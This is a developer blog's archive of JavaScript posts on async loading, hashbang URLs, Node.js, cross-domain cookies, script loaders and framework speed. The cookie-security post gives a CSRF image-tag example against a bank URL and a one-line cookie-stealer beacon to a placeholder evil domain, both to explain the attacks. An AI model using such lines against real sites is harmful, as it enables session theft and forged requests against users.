Showing posts with label java script. Show all posts
Showing posts with label java script. Show all posts

Wednesday, November 7, 2012

Asynchronous JS loading without blocking onload

Asynchronous JS is best way to load js file in your HTML page but it still blocks window.onload event (except in IE before version 10).

checkout here how onload blocked even we use asyn js loading techniques

http://www.stevesouders.com/blog/2012/01/13/javascript-performance/

http://calendar.perfplanet.com/2010/the-truth-about-non-blocking-javascript/

So here is another solution for same :-)
  1. create an iframe without setting src to a new URL. This fires onload of the iframe immediately and the whole thing is completely out of the way
  1. style the iframe to make it invisible
  1. get the last script tag so far, which is the snippet itself. This is in order to glue the iframe to the snippet that includes it.
  1. insert the iframe into the page
  1. get a handle to the document object of the iframe
  1. write some HTML into that iframe document
  1. this HTML includes the desired script
Code:

(function(url){
var iframe = document.createElement('iframe');
(iframe.frameElement || iframe).style.cssText = "width: 0; height: 0; border: 0";
var where = document.getElementsByTagName('script');
where = where[where.length - 1];
where.parentNode.insertBefore(iframe, where);
var doc = iframe.contentWindow.document;
doc.open().write('<body onload="'+
'var js = document.createElement(\'script\');'+
'js.src = \''+ url +'\';'+
'document.body.appendChild(js);">');
doc.close();
})('http://www.jspatterns.com/files/meebo/asyncjs1.php');

Issues:

1. Avoid SSL warnings: iframe.src defaults to “about:blank” in IE6, which it then treats as insecure content on HTTPS pages. We found that initializing iframe.src to “javascript:false”.

2. Avoid crossdomain exceptions: anonymous iframe access will throw exceptions if the host page changed the document.domain value in IE. The original Meebo code falls back to a “javascript:” URL when this happens.


3. The script (asyncjs1.php) runs is in an iframe, so all document and window references point to the iframe, not the host page.There's an easy solution for that without changing the whole script. Just wrap it in an immediate function and pass the document object the script expects:

(function(document){
document.getElementById('r')... // all fine
})(parent.document);

4. The script works fine in Opera, but blocks onload. Opera is weird here. Even regular async scripts block DOMContentLoaded which is a shame.

seems below code solves our problem ..  try it and let me know the results ...

https://github.com/pablomoretti/jcors-loader

Sunday, June 24, 2012

shebang/hashbang and Single Page Interface Good or Bad

We have noticed long URLs including # or #! in twitter and facebook. Actually # is known as The fragment identifier introduced by a hash mark # is the optional last part of a URL for a document,It is typically used to identify a portion of that document.
# behavior depends on document MIME type like in PDF, it acts in different manner.

The reason that Facebook and other Javascript-driven applications use this because they want to make pages indexable, bookmarkable and support the back button without reloading the entire page from the server. This technique is called Single Page Interface which is based on JavaScript routing.
When we use #! then it will be considered "AJAX crawlable." So suppose url is /ajax.html#!key=value then it temporarily become /ajax.html?_escaped_fragment_=key=value this is happening because
Hash fragments are never (by specification) sent to the server as part of an HTTP request so crawler needs some way to let your server know that it wants the content for the URL with #.
And server, on the other hand, needs to know that it has to return an HTML snapshot, rather than the normal page sent to the browser. Here snapshot is all the content that appears on the page after the JavaScript has been executed.

Other Uses except AJAX
In pagination we can use #!. URLs like blog/topic/page/1 and blog/topic/page/2 etc can appear as duplicate content and google doesn't like that so maybe in this case we make hashbangs be better or just a robots no index on any page that is a pagination of another page.

Other benefit to this technique is loading page content through AJAX and then injecting it into the current DOM can be much faster than loading a new page. In addition to the speed increase, further tricks like loading certain portions in the background can be performed under the programmer's control.

Issues

With hashbang URLs, the browser needs to download an HTML page, download and execute some JavaScript, recognize the hashbang path (which is only visible to the browser), then fetch and render the content for that URL. So By removing it,we can reduce the page load time it takes.


Spiders and search indexers can and do sometimes implement JavaScript runtimes. However, even in this case there’s no well recognised way to say ‘this is a redirect’ or ‘this content is not found’ in a way that non-humans will understand.

Also code will be not maintainable unless we use some modular kind of code at front-end side (Java Script ) otherwise it will be very hard to adopt further enhancements and support existing code. 

Solution

location.hash was a way for AJAX applications to get back button and bookmarking support.

HTML 5 now introduce with pushState. it provides a way to change the URL displayed in the browser through JavaScript without reloading the page.

window.history.pushState(data, "Title", "/new-url");

In order to support the back and forward buttons we must be notified when they are clicked. we can do that using thewindow.onpopstate event. This event gives access to the state data that passed to pushState earlier. Of course, we can manually go back and forward with the standard history functions.

Currently, pushState has support from the latest versions of Safari and Chrome, and Firefox 4 will be supporting it as well. It is worth noting that Flickr is already using the API in their new layout.
Libraries like jQuery BBQ start to support this feature with fallback to the old hash trick.

The hard part is that support for history.pushState in Internet Explorer does not appear to be forthcoming. That makes the argument that browsers are quickly adopting that feature pretty dubious since IE accounts for a good 30-40% of traffic.

Found a very nice case study in this. Here you can understand how hashbang impact on page routing and whats are basic pitfalls.

Wednesday, September 21, 2011

web based business development and node js

I really shocked when i install node js and run few test scripts. it's tremendous and powerful and gives wings to do anything. we can build chat server in few minutes ... can build web server,TCP/IP service,Message Queues,DB connections etc. 


Main advantages are:



  1. Web development in a dynamic language (JavaScript) on a VM that is incredibly fast (V8). It is much faster than Ruby, Python,PHP or Perl.
  2. Ability to handle thousands of concurrent connections with minimal overhead on a single process.
  3. JavaScript is perfect for event loops with first class function objects and closures. People already know how to use it this way having used it in the browser to respond to user initiated events.
  4. A lot of people already know JavaScript, even people who do not claim to be programmers. It is arguably the most popular programming language.
  5. Using JavaScript on a web server as well as the browser reduces the impedance mismatch between the two programming environments which can communicate data structures via JSON that work the same on both sides of the equation. Duplicate form validation code can be shared between server and client, etc.
 While i am elaborating things , will share few more things with screen shots. which might be intrested to you people to understand magic of NODE JS.

Monday, September 12, 2011

cross domain cookie,third party cookie and cross site ajax facts and myths

There are few questions in my mind which need appropriate & correct answers...
  1. it's possible to set a cookies to another domain with javascript
  2. Ajax Cross Domain Calls or making cross-sub-domain ajax (XHR) requests
  3. How Open social works
In below lines i am discussing each one by one but i request that please feel free post your comments if you feel any correction here or have some queries or comments.


we know about basic of cookie http://ravirajsblog.blogspot.com/2010/11/abc-of-http-cookie-detailed-look.html and some typical PHP session issue http://ravirajsblog.blogspot.com/2010/06/php-session-issue.html


Actually there are some security concerns in cross domain communications even server side languages also need some settings when communicate cross server
(http://php.net/manual/en/filesystem.configuration.php)
main concern is Cookie stealing and XSS(http://ha.ckers.org/xss.html) & Cross-site request forgery (CSRF). CSFR generally now avoided by filtering user input otherwise such type things occurs.


<img src="http://bank.example/withdraw?account=raviraj&amount=1000000000&for=bob"> 


Anyway come back to Cookie stealing.
Cookies are sent in plain text over the Internet, making them vulnerable to packet sniffing whereby someone intercepts traffic between a computer and the Internet. Once the value of a user’s login cookie is taken, it can be used to simulate the same session elsewhere by manually setting the cookie. The server can’t tell the difference between the original cookie that was set and the duplicated one that was stolen through packet sniffing, so it acts as if the user had logged in. This type of attack is called session hijacking.


A script from loaded another domain will get that page’s cookies by reading document.cookie.


As an example of how dangerous this is, suppose I load a script from evil-domain.com that contains some actually useful code. However, the folks at evil-domain.com then switch that code to the following:


(new Image()).src = "http://www.evil-domain.com/cookiestealer.php?cookie=" + cookie.domain;


Now this code is loaded on my page and silently sends my cookies back to evil-domain.com. This happens to everyone who visits my site. Once they have my cookies, it’s much easier to perpetrate other attacks including session hijacking.


There are a few ways to prevent session hijacking using cookies.


The first, and most common technique among the security-conscious, is to only send cookies over SSL. Since SSL encrypts the request on the browser before transmitting across the Internet, packet sniffing alone can’t be used to identify the cookie value. Banks and stores use this technique frequently since user sessions are typically short in duration.


Another technique is to generate a session key in some random fashion and/or a way that is based on information about the user (username, IP address, time of login, etc.). This makes it more difficult to reuse a session key, though doesn’t make it impossible.


Yet another technique is to re-validate the user before performing an activity deemed to be of a higher security level, such as transferring money or completing a purchase. For example, many sites require you to log in a second time before changing a password etc.


So finally all browsers decide to follow "same origin policy" concept.


Same origin policy is an important security concept for a number of browser-side programming languages, such as JavaScript. The policy permits scripts running on pages originating from the same site to access each other's methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites.This mechanism bears a particular significance for modern web applications that extensively depend on HTTP cookies to maintain authenticated user sessions, as servers act based on the HTTP cookie information to reveal sensitive information or take state-changing actions.A strict separation between content provided by unrelated sites must be maintained on client side to prevent the loss of data confidentiality or integrity.
But the behavior of same-origin checks and related mechanisms is not well-defined in a number of corner cases, such as for protocols that do not have a clearly defined host name or port associated with their URLs.


Well, the confusion comes when you start talking about first party and third party cookies and how they are treated differently by web browsers.


A first party cookie is a cookie that is given to the website visitor by the same domain (www.domain.com) that the web page resides on. Whereas, a third party cookie is one that is issued to the website visitor by a web server that is not on the same domain as the website.


Web pages allow inclusion of resources from anyplace on the web. For example, many site uses the YUI CSS foundation for its layout and therefore includes these files from the Yahoo! CDN at yui.yahooapis.com via a <link> tag. Due to cookie restrictions, the request to retrieve this CSS resource will not include the cookies for ravirajsblog.blogspot.com. However, yui.yahooapis.com could potentially return its own cookies with the response (it doesn’t, it’s a cookie-less server). The page at ravirajsblog.blogspot.com cannot access cookies that were sent by yui.yahooapis.com because the domain is different and vice-verse, but all the cookies still exist. In this case, yui.yahooapis.com would be setting a third-party cookie, which is a cookie tied to a domain separate from the containing page.


There are several ways to include resources from other domains in HTML:

  1. Using a <link> tag to include a style sheet.
  2. Using a <script> tag to include a JavaScript file.
  3. Using an <object> or <embed> tag to include media files.
  4. Using an <iframe> tag to include another HTML file.

In each case, an external file is referenced and can therefore return its own cookies. The interesting part is that with the request, these third-party servers receive an HTTP Referer heading (spelling is incorrect in the spec) indicating the page that is requesting the resource. The server could potentially use that information to issue a specific cookie identifying the referring page. If that same resource is then loaded from another page, the cookie would then be sent along with the request and the server can determine that someone who visited Site A also visited Site B. This is a common practice in online advertising. Such cookies are often called tracking cookies since their job is to track user movement from site to site. This isn’t actually a security threat but is an important concept to understand in the larger security discussion.
Generally third party cookies are issued for banner advertiser who places a number of banners on your site and wants to know how many times it has been requested, or it could be a third party hosted analytics vendor that issues a page tag for each of your pages that forces a cookie on your site.
In the last situation, where an analytics vendor issues a cookie through a page tag the cookie is seen as a third party cookie because it is being generated by the analytics server which is having the tracking 1×1 invisible gif image requested from it by the page tag. It is however possible to have an analytics cookie issued by the third party vendor but still look like a first party cookie.
There are 2 ways of achieving this:-
Create a DNS alias for third party analytics server so that it looks like it is actually part of your domain and so anything issued by this server because 1st party (including cookies)
Have the Javascript page tag create a cookie at run-time and then pass the cookie value back to the analytics server so the cookie is created within the page and so becomes a 1st party cookie.
The obvious advantage of the DNS alias option is that you can have a smaller page tag which is quicker to load, however the cookie making page tag has an advantage over the DNS alias because no structural changes need to be made to the site’s infrastructure and the implementation of the tag should be more straight forward. checkout how GA works in cross domain specially for e-commerce.
http://cutroni.com/blog/2006/06/25/how-google-analytics-tracks-third-party-domains/


Back to our questions. Answer of first one is:
Nope, that will not work for security reasons.You cannot do that with cookies alone.They are set explicitly per-domain, and there isn't a legitimate (read: "non-exploit") way to set them for another domain.However,if you control both servers, it may be possible to use some workarounds/hacks to achieve this, but pretty it isn't, and it may break unexpectedly.


Let's see how oauth works. using same technique we can achieve our goal.[ see the Anonymous guy's comments, how nicely he/she decribed flow.]


Approach designates one domain as the 'central' domain and any others as 'satellite' domains.
When someone clicks a 'sign in' link (or presents a persistent login cookie), the sign in form ultimately sends its data to a URL that is on the central domain, along with a hidden form element saying which domain it came from (just for convenience, so the user is redirected back afterwards).
This page at the central domain then proceeds to set a session cookie (if the login went well) and redirect back to whatever domain the user logged in from, with a specially generated token in the URL which is unique for that session.
The page at the satellite URL then checks that token to see if it does correspond to a token that was generated for a session, and if so, it redirects to itself without the token, and sets a local cookie. Now that satellite domain has a session cookie as well. This redirect clears the token from the URL, so that it is unlikely that the user or any crawler will record the URL containing that token (although if they did, it shouldn't matter, the token can be a single-use token).
Now, the user has a session cookie at both the central domain and the satellite domain. But what if they visit another satellite? Well, normally, they would appear to the satellite as unauthenticated.
However, throughout application, whenever a user is in a valid session, all links to pages on the other satellite domains have a ?s or &s appended to them. I reserve this 's' query string to mean "check with the central server because we reckon this user has a session". That is, no token or session id is shown on any HTML page, only the letter 's' which cannot identify someone.
A URL receiving such an 's' query tag will, if there is no valid session yet, do a redirect to the central domain saying "can you tell me who this is?" by putting something in the query string.
When the user arrives at the central server, if they are authenticated there the central server will simply receive their session cookie. It will then send the user back to the satellite with another single use token, which the satellite will treat just as a satellite would after logging in (see above). Ie, the satellite will now set up a session cookie on that domain, and redirect to itself to remove the token from the query string.
This solution works without script, or iframe support. It does require '?s' to be added to any cross-domain URLs where the user may not yet have a cookie at that URL. I think this is possible one approach how we logged in in gmail when we already browsing orkut as registered user.


So we disappointed in first answer!! don't worry let's look for second one .. i am trying my best to say yes however ;-)


Answer for second one is NO... This restriction comes because of the same origin policy and even sub-domain ajax calls are not allowed.


By enabling mod_proxy module of apache2, we can configure apache in reverse proxy mode. In reverse proxy mode, apache2 appears be like an ordinary web server to the browser. However depending upon the proxy rules defined, apache2 can make cross-domain request and serve data back to the browser.


Another method of achieving sub-domain ajax requests is by using iframes. However, javascript does not allow communication between two frames if they don’t have same document.domain. The simplest of the hacks to make this communication possible is to set document.domain of the iframe same as that of the parent frame.


The second method deals with cases when you want to fetch data from a sub-domain. You can’t make an ajax call directly from the parent page, hence you do it through iframes.Consider case of facebook chat. If you see in firebug all chat related ajax are sent to channel.facebook.com which is achieved by iframe approch.


Few hacky open sourses also avalble like http://remysharp.com/2007/10/08/what-is-jsonp/


Now come to last question, how open social works ?
This is big topic which need brief detail. so many components are which we need to understand before looking open social like  Shindig,Gadget Server,RPC,REST,container server,container application etc
Here is good link to know more about open soical
That's it for now. Cheers!!!

Thursday, December 23, 2010

Few more thoughts on script loaders in websites

Last week JS GURU Steve Souders (Google) released his ControlJS project. The goal of the project is that to provide freedom to developer to load js files and execute them later on a page as per user action.
In our shiksha.com, we already applied same technique. we load heavy dynamic pages in overlay (modal box) through AJAX but initially we encountered with one problem .. if we load a page with AJAX and suppose that page contain inline JS code .. then that JS code will not be executed. so finally we used some technique/ hack and solved issue.

Actually we parse whole inline JS and CSS that comes in script and css html tag and evaled it later once we get ajax success callback. here is code for same.

function ajax_parseJs(obj)
{
    var scriptTags = obj.getElementsByTagName('SCRIPT');
    var string = '';
    var jsCode = '';
    for(var no=0;no<scriptTags.length;no++){
        if(scriptTags[no].src){
            var head = document.getElementsByTagName("head")[0];
            var scriptObj = document.createElement("script");

            scriptObj.setAttribute("type", "text/javascript");
            scriptObj.setAttribute("src", scriptTags[no].src);
        }else{
            if(navigator.userAgent.indexOf('Opera')>=0){
                jsCode = jsCode + scriptTags[no].text + 'n';
            }
            else
                jsCode = jsCode + scriptTags[no].innerHTML;
        }

    }

    if(jsCode)ajax_installScript(jsCode);
}
function evaluateCss(obj)
{
   var cssTags = obj.getElementsByTagName('STYLE');
   var head = document.getElementsByTagName('HEAD')[0];
   for(var no=0;no<cssTags.length;no++){
      head.appendChild(cssTags[no]);
   }
}
function ajax_installScript(script)
{
    if (!script)
        return;
    if (window.execScript){
        window.execScript(script)
    }else if(window.jQuery && jQuery.browser.safari){ // safari detection in jQuery
        window.setTimeout(script,0);
    }else{
        window.setTimeout( script, 0 );
    }
}

So i thought that can we do same for script loading ? i think it's not a big deal to load script and execute it
when developer want. here is code for same.


function loadScript(url, callback){
    var script = document.createElement("script")
    script.type = "text/javascript";
    if (script.readyState){  //IE
        script.onreadystatechange = function(){
            if (script.readyState == "loaded" ||
                    script.readyState == "complete"){
                script.onreadystatechange = null;
                callback();
            }
        };
    } else {  //Others
        script.onload = function(){
            callback();
        };
    }
    script.src = url;
    document.getElementsByTagName("head")[0].appendChild(script);
}


var script = document.createElement("script");
script.type = "text/cache";
script.src = "foo.js";
script.onload = function(){
    //script has been loaded but not executed
};
document.body.insertBefore(script, document.body.firstChild);

//at some point later
script.execute();

Hope above techniques are clear and you don't have any doubts .. if still you have any query then write me on mail @ tussion @ ymail dot com

Happy coding ... Enjoy XMAS holidays ...

Thursday, March 19, 2009

Eval is Evil ...

The Eval method is JS takes a string containing JavaScript code, compiles it and runs it.It is probably the most powerful and most misused method in JavaScript.
In the majority of cases, eval is used like a sledgehammer swatting a fly -- it gets the job done, but with too much power. It's slow, it's unwieldy, and tends to magnify the damage when you make a mistake. Please spread the word far and wide: if you are considering using eval then there is probably a better way. Think hard before you use eval. eval starts a compiler. Before you use it, ask yourself whether there is a better way to solve this problem than starting up a compiler!

Here few points that force to not use Eval.

Debugability: what is easier to debug, a program that dynamically generates new code at runtime, or a program with a static body of code?

Maintainability: What's easier to maintain, a table or a program that dynamically spits new code?

Speed: which do you think is faster, a program that dereferences an array, or a program that starts a compiler?

think about string more than 10,000 persons name and we want to eval that string ... JavaScript encountered with problem on manipulating and eval()ing very large strings.


Memory: which uses more memory, a program that dereferences an array, or a program that starts a compiler and compiles a new chunk of code every time you need to access an array?


Learn More ....

http://blogs.msdn.com/ericlippert/archive/2003/11/04/53335.aspx

http://blogs.msdn.com/ericlippert/archive/2003/11/01/53329.aspx


Saturday, December 20, 2008

Which Javascript frameworks are the most common and why ?

The frameworks i looked for this article were Prototype, JQuery, MooTools, Yahoo! UI Library, Dojo, ExtJS and MochiKit.

Prototype

Prototype is one of the earlier Javascript frameworks.Of the websites in this test, a total of 13 used the Prototype framework.

JQuery

JQuery is a framework that has received a lot of attention due to its speed, size and smart modular approach which has led to a big library of plugins. Of the websites in this test, 11 used the JQuery framework.

MooTools

Just like other Javascript frameworks, MooTools contains several functions to help development. One of the more known ones is its advanced effects component. Of the websites in this test, four used the MooTools frameworks.

Yahoo! UI Library (YUI)

Yahoo has developed its own Javascript framework. They use it for their own websites, but have also made it freely available to others. Of the websites in this test, seven used the Yahoo! UI Library.

The ones using more than one framework were Digg (Prototype and JQuery), Bebo (MooTools and YUI) and YouSendIt (Prototype and YUI).

Prototype turned out to be the most-used framework in this survey, and of course it takes cake but JQuery not far behind. Please see following links regarding who is best.

http://blog.solnic.eu/2007/11/11/jquery-vs-prototype-part-i


http://blog.solnic.eu/2008/2/3/jquery-vs-prototype-part-ii

finally i must say that Jquery and prototype are both great libraries. I think now jQuery's philosophy (type less, do more, keeping things intuitive and unobtrusive) will make a big difference.

size is always a concern. Most important is speed :) and again prototype got success here.
we can get it as a 14.4kb gzipped version file.


http://groups.google.com/group/prototype-core/browse_thread/thread/ef05ede819727d52

http://ajax.googleapis.com/ajax/libs/prototype/1.6.0.3/prototype.js
http://groups.google.com/group/prototype-core

but at last we can not close eyes.
i think now Jquery is really starting to overtake prototype and prototype is losing ground. No matter how great of a library is, with the current strategy , this fantastic lib will not survive.prototype should have components not a whole lot but atleast a few basic ones like jquery’s tabs, accordion ect.. i request to prototype dev team to do something about it because people are starting to get woried !!!

Wednesday, December 17, 2008

one more markup editor ...

SmartMarkUP is a lightweight and powerful fancy markup editor.
HTML, CSS, XML, Wiki syntax, BBCode or any other desired markup language can be implemented and/or adjusted as per our preferences and business needs.

http://www.phpcow.com/smartmarkup/

Features:-
* It is completely free and open source
* It is a small script, compressed version weights only 10kb.
* It is completely skin-able we can fit it’s design with your applications easily.
* It can be used from any other script.
* It is self contained and doesn’t depend on any third party scripts. we can use it with Prototype, jQuery, Mootools or any other JavaScript libraries.
* It doesn’t requires changing of already existing markup or code infrastructure.
* It degrades gracefully, that means our application will continue working in browsers with disabled JavaScript.

Friday, December 12, 2008

what is cross domain XMLHttpRequest (CS-XHR) ?

W3C define and structure a client-side documents greater control over who can, and can not, request them via a browser-based request (such as via an Ajax Request ). that W3C framework called W3C Access Control.

Additionally, this access control scheme gives applications the ability to allow for cross-site requests.
Thus one could, theoretically, request a document from google.com, via an XMLHttpRequest in a page on yoursite.com (once the access control points were put in place). This level of control gives content creators greater amounts of flexibility when it comes to allowing their users to build mashups and applications using their information.

JavaScript Library Loading Speed

There was an interesting piece of JavaScript performance analysis done recently, by the PBWiki team. They wanted to understand a few things about how quickly JavaScript libraries loaded (obviously, their loading speed grossly effecting the total loading speed of a page). They set up a system to gather input from random browsers, aggregating the results into a final breakdown. There's a lot that application, and browser, developers can learn from the results - the total information available is actually quite profound:

JavaScript Packaging Techniques

When distributing a piece of JavaScript code it's traditional to think that the smallest (byte-size) code will download and load the fastest. This is not true - and is a fascinating result of this survey. Looking at the speed of loading jQuery in three forms: normal, minified (using Yahoo Min), and packed (using Packer). By order of file size, packed is the smallest, then minifed, then normal. However, the packed version has an overhead: It must be uncompressed, on the client-side, using a JavaScript decompression algorithm. This unpacking has a tangible cost in load time. This means, in the end, that using a minifed version of the code is much faster than the packed one - even though its file size is quite larger.

Packaging Comparison (loading jquery, all variants)

Minified Time Avg Samples
minified 519.7214 12611
packed 591.6636 12606
normal 645.4818 12589

Next time you pick a compression technique, remember this formula:

Total_Speed = Time_to_Download + Time_to_Evaluate

JavaScript Library Performance

The next nugget of information, that we can unearth, is the total performance of JavaScript libraries, when loading within a page (this includes their transfer time and their evaluation time). Thus, a library that is both smaller and simpler will load faster. Looking at the results you can see a, comparatively, large lead for jQuery (200-400ms - a perceptible difference in speed).

Average Time to Load Toolkit (non cached, gzipped, minified)

Toolkit Time Avg Samples
jquery-1.2.1 732.1935 3152
dojo-1.0.1 911.3255 3143
prototype-1.6.0 923.7074 3144
yahoo-utilities-2.4.0 927.4604 3141
protoculous-1.0.2 1136.5497 3136

Now, some might argue that testing the speed of un-cached pages would be unfair, however according to Yahoo's research on caching, approximately 50% of users will never have the opportunity to have the page contents be cached. Thus, making sure that you page loads quickly both on initial load, and subsequent loads, should be of the utmost importance.

Average Time to Load Toolkit (cached, gzipped, minified)

Toolkit Time Avg Samples
yahoo-utilities-2.4.0 122.7867 3042
jquery-1.2.1 131.1841 3161
prototype-1.6.0 142.7332 3040
dojo-1.0.1 171.2600 3161
protoculous-1.0.2 276.1929 3157

Once you examine cached speeds the difference becomes much less noticeable (10-30ms difference - with the exception of Prototype/Scriptaculous). Since these results are completely cached we can gauge, roughly, the overhead that's provided by file transfer, in comparison to evaluation speed).

If nothing else, I think this type of analysis warrants further examination. Using user-generated input, against live datasets, to create real-world performance metrics is quite lucrative to everyone involved - to users, framework developers, and browser vendors.

» More information on the web browser performance shown below.

Browser Time Avg Samples
Firefox 3.x 14.0000 2
Safari 19.8908 284
IE 7.x 27.4372 247
IE 6.x 41.3167 221
Firefox 2.x 111.0662 2009
Opera 5.x 925.3057 157